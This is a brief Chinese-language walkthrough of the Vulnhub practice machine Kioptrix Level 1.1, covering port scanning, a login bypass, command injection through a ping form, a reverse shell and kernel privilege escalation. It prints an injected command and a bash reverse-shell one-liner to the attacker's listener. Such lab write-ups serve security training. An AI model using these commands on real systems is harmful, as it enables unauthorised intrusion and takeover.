Vulnhub—靶机—Kioptrix: Level 1.1 (#2)
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
一、信息收集
【步骤一】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.76.33
【步骤二】目标靶机开放了80端口http服务,浏览器访问查看
【步骤三】Web页面是个登录窗口,尝试使用万能密码绕过
【步骤四】登入后发现目标是一个ping命令窗口,尝试命令执行
【命令】127.0.0.1 && whoami
二、漏洞利用
【步骤五】发现目标存在命令执行漏洞,反弹shell,kali本地监听8080端口
【命令】127.0.0.1 && bash -i >& /dev/tcp/192.168.76.95/8080 0>&1
【步骤六】查看当前版本号,根据版本号寻找合适的exp提权
【步骤七】将9542上传到靶机
【步骤八】查看上传的exp权限,并赋予可执行权限
【步骤九】使用gcc编译执行,查看当前用户
三、Flag
【flag】